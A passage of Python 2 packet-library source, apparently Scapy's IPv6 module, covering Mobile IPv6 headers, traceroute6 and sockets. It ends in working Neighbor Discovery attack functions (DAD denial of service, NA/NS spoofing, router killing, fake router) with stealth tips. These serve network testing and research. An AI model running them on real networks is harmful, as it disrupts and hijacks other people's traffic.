9: 'Fast BA',
10: 'Fast NA' }
# From http://www.iana.org/assignments/mobility-parameters
bastatus = { 0: 'Binding Update accepted',
1: 'Accepted but prefix discovery necessary',
128: 'Reason unspecified',
129: 'Administratively prohibited',
130: 'Insufficient resources',
131: 'Home registration not supported',
132: 'Not home subnet',
133: 'Not home agent for this mobile node',
134: 'Duplicate Address Detection failed',
135: 'Sequence number out of window',
136: 'Expired home nonce index',
137: 'Expired care-of nonce index',
138: 'Expired nonces',
139: 'Registration type change disallowed',
140: 'Mobile Router Operation not permitted',
141: 'Invalid Prefix',
142: 'Not Authorized for Prefix',
143: 'Forwarding Setup failed (prefixes missing)',
144: 'MIPV6-ID-MISMATCH',
145: 'MIPV6-MESG-ID-REQD',
146: 'MIPV6-AUTH-FAIL',
147: 'Permanent home keygen token unavailable',
148: 'CGA and signature verification failed',
149: 'Permanent home keygen token exists',
150: 'Non-null home nonce index expected' }
class _MobilityHeader(Packet):
name = 'Dummy IPv6 Mobility Header'
overload_fields = { IPv6: { "nh": 135 }}
def post_build(self, p, pay):
p += pay
l = self.len
if self.len is None:
l = (len(p)-8)/8
p = p[0] + struct.pack("B", l) + p[2:]
if self.cksum is None:
cksum = in6_chksum(135, self.underlayer, p)
else:
cksum = self.cksum
p = p[:4]+struct.pack("!H", cksum)+p[6:]
return p
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
name = "IPv6 Mobility Header - Generic Message"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", None, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrLenField("msg", "\x00"*2,
length_from = lambda pkt: 8*pkt.len-6) ]
# TODO: make a generic _OptionsField
class _MobilityOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def getfield(self, pkt, s):
l = self.length_from(pkt)
return s[l:],self.m2i(pkt, s[:l])
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
def m2i(self, pkt, x):
opt = []
while x:
o = ord(x[0]) # Option type
cls = self.cls
if moboptcls.has_key(o):
cls = moboptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class MIP6MH_BRR(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Refresh Request"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 0, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("res2", None),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 8,
length_from = lambda pkt: 8*pkt.len) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
# Hack: BRR, BU and BA have the same hashret that returns the same
# value "\x00\x08\x09" (concatenation of mhtypes). This is
# because we need match BA with BU and BU with BRR. --arno
return "\x00\x08\x09"
class MIP6MH_HoTI(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test Init"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 1, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrFixedLenField("reserved", "\x00"*2, 2),
StrFixedLenField("cookie", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 16,
length_from = lambda pkt: 8*(pkt.len-1)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
class MIP6MH_CoTI(MIP6MH_HoTI):
name = "IPv6 Mobility Header - Care-of Test Init"
mhtype = 2
def hashret(self):
return self.cookie
class MIP6MH_HoT(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 3, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("index", None),
StrFixedLenField("cookie", "\x00"*8, 8),
StrFixedLenField("token", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
def answers(self):
if (isinstance(other, MIP6MH_HoTI) and
self.cookie == other.cookie):
return 1
return 0
class MIP6MH_CoT(MIP6MH_HoT):
name = "IPv6 Mobility Header - Care-of Test"
mhtype = 4
def hashret(self):
return self.cookie
def answers(self):
if (isinstance(other, MIP6MH_CoTI) and
self.cookie == other.cookie):
return 1
return 0
class LifetimeField(ShortField):
def i2repr(self, pkt, x):
return "%d sec" % (4*x)
class MIP6MH_BU(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Update"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 5, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
XShortField("seq", None), # TODO: ShortNonceField
FlagsField("flags", "KHA", 7, "PRMKLHA"),
XBitField("reserved", 0, 9),
LifetimeField("mhtime", 3), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len - 4) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if isinstance(other, MIP6MH_BRR):
return 1
return 0
class MIP6MH_BA(_MobilityHeader):
name = "IPv6 Mobility Header - Binding ACK"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 6, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ByteEnumField("status", 0, bastatus),
FlagsField("flags", "K", 3, "PRK"),
XBitField("res2", None, 5),
XShortField("seq", None), # TODO: ShortNonceField
XShortField("mhtime", 0), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len-4) ]
overload_fields = { IPv6: { "nh": 135 }}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if (isinstance(other, MIP6MH_BU) and
other.mhtype == 5 and
self.mhtype == 6 and
other.flags & 0x1 and # Ack request flags is set
self.seq == other.seq):
return 1
return 0
_bestatus = { 1: 'Unknown binding for Home Address destination option',
2: 'Unrecognized MH Type value' }
# TODO: match Binding Error to its stimulus
class MIP6MH_BE(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Error"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 7, mhtypes),
ByteField("res", 0),
XShortField("cksum", None),
ByteEnumField("status", 0, _bestatus),
ByteField("reserved", 0),
IP6Field("ha", "::"),
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 }}
_mip6_mhtype2cls = { 0: MIP6MH_BRR,
1: MIP6MH_HoTI,
2: MIP6MH_CoTI,
3: MIP6MH_HoT,
4: MIP6MH_CoT,
5: MIP6MH_BU,
6: MIP6MH_BA,
7: MIP6MH_BE }
#############################################################################
#############################################################################
### Traceroute6 ###
#############################################################################
#############################################################################
class AS_resolver6(AS_resolver_riswhois):
def _resolve_one(self, ip):
"""
overloaded version to provide a Whois resolution on the
embedded IPv4 address if the address is 6to4 or Teredo.
Otherwise, the native IPv6 address is passed.
"""
if in6_isaddr6to4(ip): # for 6to4, use embedded @
tmp = inet_pton(socket.AF_INET6, ip)
addr = inet_ntop(socket.AF_INET, tmp[2:6])
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
addr = teredoAddrExtractInfo(ip)[2]
else:
addr = ip
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
return ip,asn,desc
class TracerouteResult6(TracerouteResult):
__slots__ = []
def show(self):
return self.make_table(lambda (s,r): (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 !
s.hlim,
r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+
"{ICMPv6EchoReply:%ir,type%}")))
def get_trace(self):
trace = {}
for s,r in self.res:
if IPv6 not in s:
continue
d = s[IPv6].dst
if d not in trace:
trace[d] = {}
t = not (ICMPv6TimeExceeded in r or
ICMPv6DestUnreach in r or
ICMPv6PacketTooBig in r or
ICMPv6ParamProblem in r)
trace[d][s[IPv6].hlim] = r[IPv6].src, t
for k in trace.itervalues():
try:
m = min(x for x, y in k.itervalues() if y[1])
except ValueError:
continue
for l in k.keys(): # use .keys(): k is modified in the loop
if l > m:
del k[l]
return trace
def graph(self, ASres=AS_resolver6(), **kargs):
TracerouteResult.graph(self, ASres=ASres, **kargs)
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
l4 = None, timeout=2, verbose=None, **kargs):
"""
Instant TCP traceroute using IPv6 :
traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
"""
if verbose is None:
verbose = conf.verb
if l4 is None:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport),
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)
else:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4,
timeout=timeout, verbose=verbose, **kargs)
a = TracerouteResult6(a.res)
if verbose:
a.display()
return a,b
#############################################################################
#############################################################################
### Sockets ###
#############################################################################
#############################################################################
class L3RawSocket6(L3RawSocket):
def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
L3RawSocket.__init__(self, type, filter, iface, promisc)
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
def IPv6inIP(dst='203.178.135.36', src=None):
_IPv6inIP.dst = dst
_IPv6inIP.src = src
if not conf.L3socket == _IPv6inIP:
_IPv6inIP.cls = conf.L3socket
else:
del(conf.L3socket)
return _IPv6inIP
class _IPv6inIP(SuperSocket):
dst = '127.0.0.1'
src = None
cls = None
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
SuperSocket.__init__(self, family, type, proto)
self.worker = self.cls(**args)
def set(self, dst, src=None):
_IPv6inIP.src = src
_IPv6inIP.dst = dst
def nonblock_recv(self):
p = self.worker.nonblock_recv()
return self._recv(p)
def recv(self, x):
p = self.worker.recv(x)
return self._recv(p, x)
def _recv(self, p, x=MTU):
if p is None:
return p
elif isinstance(p, IP):
# TODO: verify checksum
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
if isinstance(p.payload, IPv6):
return p.payload
return p
def send(self, x):
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x)
#############################################################################
#############################################################################
### Neighbor Discovery Protocol Attacks ###
#############################################################################
#############################################################################
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
tgt_filter=None, reply_mac=None):
"""
Internal generic helper accepting a specific callback as first argument,
for NS or NA reply. See the two specific functions below.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
# Get and compare the MAC address
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must be the unspecified address
if req[IPv6].src != "::":
return 0
# Check destination is the link-local solicited-node multicast
# address associated with target address in received NS
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
received_snma = socket.inet_pton(socket.AF_INET6, req[IPv6].dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
return 0
return 1
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, iface),
iface=iface)
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening incoming NS messages sent from the
unspecified address and sending a NS reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NS sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the unspecified address (::).
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
"""
def ns_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS by sending a similar NS
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt)
sendp(rep, iface=iface, verbose=0)
print "Reply NS for target address %s (received from %s)" % (tgt, mac)
_NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening incoming NS messages *sent from the
unspecified address* and sending a NA reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address found in received NS.
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
"""
def na_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS with a NA
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst)
rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print "Reply NA for target address %s (received from %s)" % (tgt, mac)
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None, router=False):
"""
The main purpose of this function is to send fake Neighbor Advertisement
messages to a victim. As the emission of unsolicited Neighbor Advertisement
is pretty pointless (from an attacker standpoint) because it will not
lead to a modification of a victim's neighbor cache, the function send
advertisements in response to received NS (NS sent as part of the DAD,
i.e. with an unspecified address as source, are not considered).
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address
- as IPv6 destination address: the source IPv6 address of received NS
message.
- the mac address of the interface as source (or reply_mac, see below).
- the source mac address of the received NS as destination macs address
of the emitted NA.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
filled with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
router: by the default (False) the 'R' flag in the NA used for the reply
is not set. If the parameter is set to True, the 'R' flag in the
NA is set, advertising us as a router.
Please, keep the following in mind when using the function: for obvious
reasons (kernel space vs. Python speed), when the target of the address
resolution is on the link, the sender of the NS receives 2 NA messages
in a row, the valid one and our fake one. The second one will overwrite
the information provided by the first one, i.e. the natural latency of
Scapy helps here.
In practice, on a common Ethernet link, the emission of the NA from the
genuine target (kernel stack) usually occurs in the same millisecond as
the receipt of the NS. The NA generated by Scapy6 will usually come after
something 20+ ms. On a usual testbed for instance, this difference is
sufficient to have the first data packet sent from the victim to the
destination before it even receives our fake NA.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must NOT be the unspecified address
if req[IPv6].src == "::":
return 0
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
dst = req[IPv6].dst
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
# If this is a real address resolution NS, then the destination
# address of the packet is the link-local solicited node multicast
# address associated with the target of the NS.
# Otherwise, the NS is a NUD related one, i.e. the peer is
# unicasting the NS to check the target is still alive (L2
# information is still in its cache and it is verified)
received_snma = socket.inet_pton(socket.AF_INET6, dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
print "solicited node multicast @ does not match target @!"
return 0
return 1
def reply_callback(req, reply_mac, router, iface):
"""
Callback that reply to a NS with a spoofed NA
"""
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
# send it back.
mac = req[Ether].src
pkt = req[IPv6]
src = pkt.src
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src)
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS
# "If the solicitation IP Destination Address is not a multicast
# address, the Target Link-Layer Address option MAY be omitted"
# Given our purpose, we always include it.
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print "Reply NA for target address %s (received from %s)" % (tgt, mac)
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
router = (router and 1) or 0 # Value of the R flags in NA
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, router, iface),
iface=iface)
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
dst=None, src_mac=None, dst_mac=None, loop=True,
inter=1, iface=None):
"""
The main purpose of this function is to send fake Neighbor Solicitations
messages to a victim, in order to either create a new entry in its neighbor
cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
that a node SHOULD create the entry or update an existing one (if it is not
currently performing DAD for the target of the NS). The entry's reachability
state is set to STALE.
The two main parameters of the function are the source link-layer address
(carried by the Source Link-Layer Address option in the NS) and the
source address of the packet.
Unlike some other NDP_Attack_* function, this one is not based on a
stimulus/response model. When called, it sends the same NS packet in loop
every second (the default)
Following arguments can be used to change the format of the packets:
src_lladdr: the MAC address used in the Source Link-Layer Address option
included in the NS packet. This is the address that the peer should
associate in its neighbor cache with the IPv6 source address of the
packet. If None is provided, the mac address of the interface is
used.
src: the IPv6 address used as source of the packet. If None is provided,
an address associated with the emitting interface will be used
(based on the destination address of the packet).
target: the target address of the NS packet. If no value is provided,
a dummy address (2001:db8::1) is used. The value of the target
has a direct impact on the destination address of the packet if it
is not overridden. By default, the solicited-node multicast address
associated with the target is used as destination address of the
packet. Consider specifying a specific destination address if you
intend to use a target address different than the one of the victim.
dst: The destination address of the NS. By default, the solicited node
multicast address associated with the target address (see previous
parameter) is used if no specific value is provided. The victim
is not expected to check the destination address of the packet,
so using a multicast address like ff02::1 should work if you want
the attack to target all hosts on the link. On the contrary, if
you want to be more stealth, you should provide the target address
for this parameter in order for the packet to be sent only to the
victim.
src_mac: the MAC address used as source of the packet. By default, this
is the address of the interface. If you want to be more stealth,
feel free to use something else. Note that this address is not the
that the victim will use to populate its neighbor cache.
dst_mac: The MAC address used as destination address of the packet. If
the IPv6 destination address is multicast (all-nodes, solicited
node, ...), it will be computed. If the destination address is
unicast, a neighbor solicitation will be performed to get the
associated address. If you want the attack to be stealth, you
can provide the MAC address using this parameter.
loop: By default, this parameter is True, indicating that NS packets
will be sent in loop, separated by 'inter' seconds (see below).
When set to False, a single packet is sent.
inter: When loop parameter is True (the default), this parameter provides
the interval in seconds used for sending NS packets.
iface: to force the sending interface.
"""
if not iface:
iface = conf.iface
# Use provided MAC address as source link-layer address option
# or the MAC address of the interface if none is provided.
if not src_lladdr:
src_lladdr = get_if_hwaddr(iface)
# Prepare packets parameters
ether_params = {}
if src_mac:
ether_params["src"] = src_mac
if dst_mac:
ether_params["dst"] = dst_mac
ipv6_params = {}
if src:
ipv6_params["src"] = src
if dst:
ipv6_params["dst"] = dst
else:
# Compute the solicited-node multicast address
# associated with the target address.
tmp = inet_ntop(socket.AF_INET6,
in6_getnsma(inet_pton(socket.AF_INET6, target)))
ipv6_params["dst"] = tmp
pkt = Ether(**ether_params)
pkt /= IPv6(**ipv6_params)
pkt /= ICMPv6ND_NS(tgt=target)
pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
ip_src_filter=None, reply_mac=None,
tgt_mac=None):
"""
The purpose of the function is to monitor incoming RA messages
sent by default routers (RA with a non-zero Router Lifetime values)
and invalidate them by immediately replying with fake RA messages
advertising a zero Router Lifetime value.
The result on receivers is that the router is immediately invalidated,
i.e. the associated entry is discarded from the default router list
and destination cache is updated to reflect the change.
By default, the function considers all RA messages with a non-zero
Router Lifetime value but provides configuration knobs to allow
filtering RA sent by specific routers (Ethernet source address).
With regard to emission, the multicast all-nodes address is used
by default but a specific target can be used, in order for the DoS to
apply only to a specific host.
More precisely, following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RA messages received from this source will trigger replies.
If other default routers advertised their presence on the link,
their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific mac address.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RA messages received from this source address will trigger
replies. If other default routers advertised their presence on the
link, their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific IPv6 source
address.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
tgt_mac: allow limiting the effect of the DoS to a specific host,
by sending the "invalidating RA" only to its mac address.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
# Check if this is an advertisement for a Default Router
# by looking at Router Lifetime value
if req[ICMPv6ND_RA].routerlifetime == 0:
return 0
return 1
def ra_reply_callback(req, reply_mac, tgt_mac, iface):
"""
Callback that sends an RA with a 0 lifetime
"""
# Let's build a reply and send it
src = req[IPv6].src
# Prepare packets parameters
ether_params = {}
if reply_mac:
ether_params["src"] = reply_mac
if tgt_mac:
ether_params["dst"] = tgt_mac
# Basis of fake RA (high pref, zero lifetime)
rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1")
rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
# Add it a PIO from the request ...
tmp = req
while ICMPv6NDOptPrefixInfo in tmp:
pio = tmp[ICMPv6NDOptPrefixInfo]
tmp = pio.payload
del(pio.payload)
rep /= pio
# ... and source link layer address option
if ICMPv6NDOptSrcLLAddr in req:
mac = req[ICMPv6NDOptSrcLLAddr].lladdr
else:
mac = req[Ether].src
rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
sendp(rep, iface=iface, verbose=0)
print "Fake RA sent with source address %s" % src
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
iface=iface)
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
ip_src_filter=None):
"""
The purpose of this function is to send provided RA message at layer 2
(i.e. providing a packet starting with IPv6 will not work) in response
to received RS messages. In the end, the function is a simple wrapper
around sendp() that monitor the link for RS messages.
It is probably better explained with an example:
>>> ra = Ether()/IPv6()/ICMPv6ND_RA()
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
>>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
>>> NDP_Attack_Fake_Router(ra, iface="eth0")
Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
...
Following arguments can be used to change the behavior:
ra: the RA message to send in response to received RS message.
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If none is provided, conf.iface is
used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RS messages received from this source will trigger a reply.
Note that no changes to provided RA is done which imply that if
you intend to target only the source of the RS using this option,
you will have to set the Ethernet destination address to the same
value in your RA.
The default value for this parameter is None: no filtering on the
source of RS is done.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RS messages received from this source address will trigger
replies. Same comment as for previous argument apply: if you use
the option, you will probably want to set a specific Ethernet
destination address in the RA.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
return 1
def ra_reply_callback(req, iface):
"""
Callback that sends an RA in reply to an RS
"""
src = req[IPv6].src
sendp(ra, iface=iface, verbose=0)
print "Fake RA sent in response to RS from %s" % src
if not iface:
iface = conf.iface
sniff_filter = "icmp6"
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, iface),
